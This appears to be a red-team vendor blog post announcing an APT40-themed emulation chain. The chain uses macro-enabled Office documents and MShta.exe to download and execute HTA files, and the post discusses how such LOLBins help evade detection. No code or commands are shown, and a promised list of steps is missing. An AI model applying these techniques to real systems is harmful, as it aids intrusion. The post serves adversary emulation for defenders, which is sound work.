Our last release looked at the APT29 RNC hack and the use of AdFind to collect, compress, and exfiltrate files from a compromised host.
For this week’s TTP Tuesday we are releasing a new APT40 themed chain based on the use of multi-stage macro-enabled Office documents. These techniques, at the time used in concert with 0-days, are still relevant today and applicable to a wide audience.
MShta.exe is a Windows binary for executing HTML Application (HTA) files. MShta is a well-known LOLBin, an application or library that is included by default in an operating systems and may be abused to execute arbitrary code or perform other actions. LOLBins are interesting because they allow attackers to perform certain actions using signed binaries and libraries which are commonly used for normal behaviour of the host operating system. As an attacker, these binaries help us evade detection as we use them to fly under the radar of a blue team given the large amount of data these teams routinely process. This week, we’re looking at how MShta can be used to download and execute code contained in an HTA file.
Malicious Office documents, or maldocs, are everywhere. APT40 used a maldoc that, in addition to circa 2017 0-days, used MShta.exe to download and execute an HTA file that would then download second stage malware.
Our maldoc contains a couple steps:
We’ve also conveniently broken out the MShta technique for use outside this maldoc.
Thanks for reading! We’ll be back next week with more examples of APT40 tradecraft!
Watch a demonstration: APT40 Defense Industry
Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:
Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg
Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg